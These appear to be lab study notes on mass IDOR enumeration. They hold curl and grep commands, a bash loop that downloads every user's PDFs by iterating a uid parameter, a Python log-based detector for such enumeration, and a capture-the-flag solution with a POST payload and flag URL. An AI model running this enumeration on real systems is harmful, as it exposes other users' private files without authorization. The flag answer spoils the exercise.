Mass IDOR Enumeration
http://SERVER_IP:PORT/documents.php?uid=1
http://SERVER_IP:PORT/documents.php?uid=2
/documents/Invoice_1_09_2021.pdf
/documents/Report_1_10_2021.pdf
# Ctrl+U to see the source page
<li class='pure-tree_link'><a href='/documents/Invoice_3_06_2020.pdf' target='_blank'>Invoice</a></li>
<li class='pure-tree_link'><a href='/documents/Report_3_01_2020.pdf' target='_blank'>Report</a></li>
# Then use curl
curl -s "http://SERVER_IP:PORT/documents.php?uid=1" | grep "<li class='pure-tree_link'>"
# Or just use regex to get the specific file that we need
curl -s "http://SERVER_IP:PORT/documents.php?uid=3" | grep -oP "\/documents.*?\.pdf"
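#!/bin/bash
# Download every PDF linked from documents.php for uid 1 through 10
url="http://SERVER_IP:PORT"
for i in {1..10}; do
    for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?\.pdf"); do
        # $link already starts with "/", so join it to $url without an extra slash
        wget -q "$url$link"
    done
done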
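Seen from the server side, the loop above shows up in the access log as one client walking through many distinct uid values on documents.php. The following detection sketch is an added example, not part of the original notes; the common log format, the threshold of 3 distinct uids, and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access log (common log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Oct/2021:10:00:01 +0000] "GET /documents.php?uid=1 HTTP/1.1" 200 812
203.0.113.7 - - [01/Oct/2021:10:00:01 +0000] "GET /documents.php?uid=2 HTTP/1.1" 200 798
203.0.113.7 - - [01/Oct/2021:10:00:02 +0000] "GET /documents.php?uid=3 HTTP/1.1" 200 805
203.0.113.7 - - [01/Oct/2021:10:00:02 +0000] "GET /documents.php?uid=4 HTTP/1.1" 200 811
203.0.113.7 - - [01/Oct/2021:10:00:03 +0000] "GET /documents.php?uid=5 HTTP/1.1" 200 790
198.51.100.20 - - [01/Oct/2021:10:05:10 +0000] "GET /documents.php?uid=4 HTTP/1.1" 200 811
198.51.100.20 - - [01/Oct/2021:10:09:44 +0000] "GET /documents.php?uid=4 HTTP/1.1" 200 811
198.51.100.20 - - [01/Oct/2021:10:09:50 +0000] "GET /index.php HTTP/1.1" 200 1520
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET /documents\.php\?(\S*) HTTP/[\d.]+" \d{3}')
UID_RE = re.compile(r'(?:^|&)uid=(\d+)(?:&|$)')

def uids_per_client(log_text):
    """Map each client IP to the set of uid values it requested from documents.php."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other pages, other methods, malformed lines
        uid = UID_RE.search(m.group(2))
        if uid:
            seen[m.group(1)].add(int(uid.group(1)))
    return dict(seen)

def longest_run(values):
    """Length of the longest run of consecutive integers in values."""
    vals = set(values)
    best = 0
    for v in vals:
        if v - 1 not in vals:  # v starts a run
            n = 1
            while v + n in vals:
                n += 1
            best = max(best, n)
    return best

def flag_enumeration(log_text, max_uids=3):
    """Clients that asked for more than max_uids distinct uids: (distinct count, longest run)."""
    return {client: (len(uids), longest_run(uids))
            for client, uids in uids_per_client(log_text).items()
            if len(uids) > max_uids}

if __name__ == "__main__":
    print(flag_enumeration(SAMPLE_LOG))
```

A uid sent in a POST body, as in the challenge request, does not appear in a standard access log, so the same check would need application-level logging of the parameter.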
For the challenge
Intercept this page

It's a POST request

Set a payload

See the result

Verify the result
curl -i -X POST -d 'uid=15' http://94.237.54.116:49507/documents.php

Get the result
http://94.237.54.116:49507/documents/flag_11dfa168ac8eb2958e38425728623c98.txt

curl http://94.237.54.116:49507/documents/flag_11dfa168ac8eb2958e38425728623c98.txt
